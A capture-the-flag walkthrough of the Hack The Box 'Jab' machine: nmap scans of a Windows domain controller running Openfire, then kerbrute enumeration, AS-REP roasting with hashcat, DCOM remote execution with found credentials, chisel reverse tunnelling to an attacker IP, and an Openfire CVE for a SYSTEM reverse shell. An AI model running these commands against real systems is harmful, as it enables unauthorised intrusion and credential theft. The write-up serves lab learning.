Recon
Let's start with a nmap scan.
Copy ┌──(kali㉿kali )-[~/Desktop/HTB/Jab]
└─$ nmap -p- -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:17 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency ).
Not shown: 65459 closed tcp ports (conn-refused), 40 filtered tcp ports ( no-response )
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49681/tcp open unknown
49790/tcp open unknown
53728/tcp open unknown
Nmap done: 1 IP address (1 host up ) scanned in 301.96 seconds
┌──(kali㉿kali )-[~/Desktop/HTB/Jab]
└─$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49790,53728 -sC -sV -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:27 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency ).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-22 07:23:30Z )
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name )
| _ssl-date: 2024-04-22T07:24:48+00:00 ; -4m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: < unsupporte d > , DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
| _Not valid after: 2024-10-31T20:16:18
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name )
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: < unsupporte d > , DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
| _Not valid after: 2024-10-31T20:16:18
| _ssl-date: 2024-04-22T07:24:46+00:00 ; -4m14s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name )
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: < unsupporte d > , DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
| _Not valid after: 2024-10-31T20:16:18
| _ssl-date: 2024-04-22T07:24:48+00:00 ; -4m13s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name )
| _ssl-date: 2024-04-22T07:24:46+00:00 ; -4m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: < unsupporte d > , DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
| _Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| _ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
| _ stream_id: 8mjpiz9qic
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
| _ capabilities:
| _ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
| _ stream_id: 55iww1rf7w
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| _ssl-date: TLS randomness does not represent time
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
| _ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| info:
| xmpp:
| version: 1.0
| capabilities:
| pre_tls:
| xmpp:
| capabilities:
| features:
| TLS
| Server Dialback
| post_tls:
| xmpp:
| lang: en-US
| _ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
| _ssl-date: TLS randomness does not represent time
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| auth_mechanisms:
| errors:
| invalid-namespace
| ( timeout )
| compression_methods:
| features:
| xmpp:
| version: 1.0
| capabilities:
| _ stream_id: 7529c6ngrx
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| ( timeout )
| compression_methods:
| features:
| xmpp:
| auth_mechanisms:
| _ capabilities:
| _ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| _http-title: Not Found
| _http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL= 0x0
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 69
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: Illegal character CNTL= 0x0 < /pr e >
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:29 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| < html >
| < head ><title>Openfire HTTP Binding Service < /titl e>< /hea d >
| < body ><font face= "Arial, Helvetica" ><b > Openfire < a href= "http://www.xmpp.org/extensions/xep-0124.html" > HTTP Binding < / a > Service < / b>< /fon t>< /bod y >
| < /html >
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:35 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 49
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: No URI < /pr e >
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT= 0x80
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 71
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: Illegal character OTEXT= 0x80 < /pr e >
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 58
| Connection: close
| < h1 > Bad Message 505 < /h 1>< pr e > reason: Unknown Version < /pr e >
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL= 0x16
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 70
| Connection: close
| _ < h 1> Bad Message 400 < /h 1>< pr e > reason: Illegal character CNTL= 0x16 < /pr e >
7443/tcp open ssl/oracleas-https?
| _ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL= 0x0
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 69
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: Illegal character CNTL= 0x0 < /pr e >
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:36 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| < html >
| < head ><title>Openfire HTTP Binding Service < /titl e>< /hea d >
| < body ><font face= "Arial, Helvetica" ><b > Openfire < a href= "http://www.xmpp.org/extensions/xep-0124.html" > HTTP Binding < / a > Service < / b>< /fon t>< /bod y >
| < /html >
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 22 Apr 2024 07:23:41 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 49
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: No URI < /pr e >
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT= 0x80
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 71
| Connection: close
| < h1 > Bad Message 400 < /h 1>< pr e > reason: Illegal character OTEXT= 0x80 < /pr e >
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 58
| Connection: close
| < h1 > Bad Message 505 < /h 1>< pr e > reason: Unknown Version < /pr e >
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL= 0x16
| Content-Type: text/html ;charset = iso-8859-1
| Content-Length: 70
| Connection: close
| _ < h 1> Bad Message 400 < /h 1>< pr e > reason: Illegal character CNTL= 0x16 < /pr e >
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
| _Not valid after: 2028-10-24T22:00:12
7777/tcp open socks5 (No authentication ; connection failed )
| socks-auth-info:
| _ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| _http-title: Not Found
| _http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49790/tcp open msrpc Microsoft Windows RPC
53728/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY )==============
SF-Port7070-TCP:V =7.94SVN%I=7%D=4/22%Time=6626116F%P=x86_64-pc-linux-gnu%r
...
SF:h1 ><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre> ");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=4/22%Time=66261175%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,189," HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2022\x2
SF:0Apr\x202024\x2007:23:36\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\
...
SF:0400 </h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre> ");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-04-22T07:24:39
|_ start_date: N/A
|_clock-skew: mean: -4m13s, deviation: 0s, median: -4m13s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.01 seconds There are numerous open ports detected on the Windows system. As we explore further, we observe several domain names. To facilitate access to these domains, we should add their entries to the /etc/hosts file.
At first glance, the presence of open ports 88 and 389 indicates the presence of a domain controller. We can also notice some non-standard ports 5222 , 5269 , 7070 , 7443 , 7777. From the same Nmap result we can understand that this machine running XMPP protocol.
Doing some googlin, we have messaging service to explore. let’s dig on it to learn more about it.
First of all we need to find a way to interact with this service, so again doing some googling we find something interesting.
Since we've identified that the machine is running the server, we now require a client to interact with it. As this is a well-known and open protocol, finding a suitable client should be relatively straightforward.
Now, we need to download a client, let’s pick pidgin as client since it’s super easy to install and use.
To access the chatroom, you'll need to create an account on the server. Once you've done that, you can join the test2@conference.jab.htb chat room. However, if there's no one currently present in the chat room, you may not find anyone to interact with. In such a case, you can leave the chat room.
Additionally, using a pidgin’s plugin we can do service discovery.
As very first step we can try to enumerate all users inside the jab.htb domain to do we need:
A user list available online.
A tool to send requests to DC, we use kerbrute
Copy kerbrute userenum --dc dc01.jab.htb -d jab.htb -v jsmith.txt --hash-file NP.txt | tee kerbrute.out Another important insight gained from this action is the harvesting of TGT (ticket-granting ticket) hashes. This is made possible due to the absence of pre-authentication, making the server vulnerable to AS_REP roasting attacks.
Run HashCat on those hashes using rockyou.txt
Copy hashcat hashes.asreproast /usr/share/wordlists/rockyou.txt We got The password of jmontgomery. Now we can go back to pidgin and login using those creds.
After Login we search for rooms again. We found a new room: Pentest2003.
Joining that room gives us the password of svc_openfire.
Initial Access
Using impacket’s dcomexec.py and svc_openfire's creds we can get a reverse shell.
Copy impacket-dcomexec 'jab.htb/svc_openfire:Password@dc01.jab.thb' 'command' -nooutput -object MMC20 -dc-ip 10.10.11.4 We have our user flag.
Privilege Escalation
Upon conducting further enumeration, we uncovered the presence of peculiar ports, specifically 9090 and 9091, active on the local system.
Copy netstat - ano | findstr '127.0.0.1:' We can test whether we have a web app:
Copy Invoke-WebRequest - Uri http: // 127.0 . 0.1 : 9090 / - UseBasicParsing Upon receiving a response with HTTP/1.1 200 OK, we can deduce that a web application is indeed running locally. To facilitate interaction with this application, we must establish port forwarding from the DC machine to our attack box, allowing access to the service locally on our box. We'll employ the well-known tool Chisel to accomplish this task.
First we need to setup a chisel server on our attack box:
Copy chisel server -p 9999 --reverse Next, we need to transfer chisel and then setup a client on DC compute then connect to server:
To utilize Chisel effectively, we'll need to download a version suitable for Linux to use on Kali and another version for Windows to use on the target system.
Copy . / chisel client 10.10 . 14.140 : 9999 R: 9090 : 127.0 . 0.1 : 9090 Now, by navigating to http://127.0.0.1:9090, we gain access to and can interact with this web application.
We Can Login using svc_openfire username and his password we found earlier.
This web server is vulnerable to CVE-2023–32315.
Using this we can confirm we are root/system.
We can setup another netcat listner to catch a reverse shell as root.
We've got our root flag.
